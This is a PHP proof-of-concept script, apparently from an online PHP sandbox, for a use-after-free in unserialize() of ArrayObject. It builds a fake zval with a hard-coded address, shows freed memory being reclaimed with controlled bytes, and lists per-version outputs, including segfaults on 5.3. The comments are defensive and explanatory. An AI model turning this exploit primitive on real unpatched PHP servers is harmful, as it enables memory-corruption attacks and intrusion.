@ 2015-08-30T02:16:07Z <?php
// Reproduction script for a memory-safety defect reached through unserialize()
// of an ArrayObject payload. Going by the outputs recorded further down this
// page: 5.4.44+, 5.5.28+ and 5.6.12+ print int(1234) for element [1];
// 5.4.0-5.4.43, 5.5.24-5.5.27 and 5.6.8-5.6.11 print bytes of $fakezval there
// instead; 5.3.x exits with code 139.
// Takeaway for application code: keep untrusted bytes away from unserialize()
// (json_decode() covers plain data interchange) and run a release from the
// range that prints int(1234).

// 28-byte binary string: two 8-byte little-endian words from ptr2str()
// followed by 12 literal bytes. The variable name suggests it imitates an
// in-memory zval; nothing on this page confirms the field layout.
$fakezval = ptr2str(1234567);
$fakezval .= ptr2str(0xdfcb70+4-0xb8); // hard-coded address constant (presumably specific to one build); original note: "where is the pointer address?"
$fakezval .= "\x46\x45\x01\x01";
$fakezval .= "\x05";// original note: "where is the shellcode?"
$fakezval .= "\x23";// original note: "where is the shellcode?"
$fakezval .= "\x63";// original note: "where is the shellcode?"
$fakezval .= "\x00\x00\x00\x00\x00";
//$fakezval .= "\xbe\xf8\x52";
// Appending an empty string leaves $fakezval unchanged.
$fakezval.= "";
// Serialized two-element array: [0] is an ArrayObject in its custom "C:" form
// wrapping $inner, [1] is a reference ("R:3") to a value parsed earlier. On the
// versions that behave correctly, [1] resolves to the i:1234 inside $inner.
$inner = 'x:i:1234;a:0:{};m:a:0:{}';
$exploit = 'a:2:{i:0;C:11:"ArrayObject":'.strlen($inner).':{'.$inner.'}i:1;R:3;}';
// NOTE(review): the defect is exercised inside this call. A PHP worker that
// dies with exit code 139 while decoding serialized input is worth alerting on.
$data = unserialize($exploit);
// Allocates five strings, each $fakezval plus one digit (29 bytes). On the
// affected versions the dump of [1] is a string(29) ending in "1", i.e. the
// content of $v[1], which indicates the reference was left pointing at memory
// that had been released and then reused by one of these strings.
for ($i = 0; $i < 5; $i++) {
$v[$i] = $fakezval.$i;
}
// Element [1] is the observable: int(1234) is the correct result.
var_dump($data);
/**
 * Encode an integer as an 8-byte string, least-significant byte first.
 *
 * Only the low 8 bits are emitted per step and the value is shifted right by
 * 8 each time, so a negative input is sign-extended into the upper bytes.
 *
 * @param int $ptr Value to encode.
 * @return string Exactly 8 bytes in little-endian order.
 */
function ptr2str($ptr)
{
    $packed = '';
    $remaining = 8;
    while ($remaining-- > 0) {
        // Emit the current low byte, then drop it from the value.
        $packed .= chr($ptr & 0xff);
        $ptr = $ptr >> 8;
    }
    return $packed;
}
?>
Output for 5.4.44 - 5.4.45 , 5.5.28 - 5.5.35 , 5.6.12 - 5.6.28 , 7.0.0 - 7.0.20 , 7.1.0 - 7.1.20 , 7.2.0 - 7.2.33 , 7.3.16 - 7.3.33 , 7.4.0 - 7.4.33 , 8.0.0 - 8.0.30 , 8.1.0 - 8.1.27 , 8.2.0 - 8.2.17 , 8.3.0 - 8.3.4 array(2) {
[0]=>
object(ArrayObject)#1 (1) {
["storage":"ArrayObject":private]=>
array(0) {
}
}
[1]=>
int(1234)
}
Output for 5.4.0 - 5.4.43 , 5.5.24 - 5.5.27 , 5.6.8 - 5.6.11 array(2) {
[0]=>
object(ArrayObject)#1 (1) {
["storage":"ArrayObject":private]=>
array(0) {
}
}
[1]=>
string(29) "�� ��� FE#c 1"
}
Output for 5.3.0 - 5.3.29 array(2) {
[0]=>
object(ArrayObject)#1 (1) {
["storage":"ArrayObject":private]=>
array(0) {
}
}
[1]=>
Process exited with code 139.
Output for 5.1.0 - 5.1.6 , 5.2.0 - 5.2.17
Warning: Class ArrayObject has no unserializer in /in/CESW1 on line 16
Notice: unserialize(): Error at offset 26 of 66 bytes in /in/CESW1 on line 16
bool(false)
Output for 4.3.2 - 4.3.11 , 4.4.0 - 4.4.9 , 5.0.0 - 5.0.5 Notice: unserialize(): Error at offset 9 of 66 bytes in /in/CESW1 on line 16
bool(false)
Output for 4.3.0 - 4.3.1 Notice: unserialize() [http://www.php.net/function.unserialize]: Error at offset 9 of 66 bytes in /in/CESW1 on line 16
bool(false)